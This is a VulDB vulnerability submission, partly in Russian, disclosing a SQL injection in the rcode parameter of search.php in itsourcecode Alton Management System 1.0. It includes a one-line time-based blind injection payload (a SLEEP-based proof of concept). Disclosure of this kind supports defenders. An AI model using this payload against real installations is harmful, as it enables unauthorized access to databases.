Отправить #381089: itsourcecode Alton Management System 1.0 SQLi search.phpИнформация

Названиеitsourcecode Alton Management System 1.0 SQLi search.php
ОписаниеThe rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection. -------------------POC--------------- Parameter: rcode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq
Источник⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
Пользователь
 Dee.Mirage (UID 71702)
Представление27.07.2024 12:20 (2 лет назад)
Модерация30.07.2024 15:29 (3 days later)
Статуспринято
Запись VulDB273142 [itsourcecode Alton Management System 1.0 search.php rcode SQL-инъекция]
Баллы20

ПредыдущийОбзорДалее

Interested in the pricing of exploits?

See the underground prices here!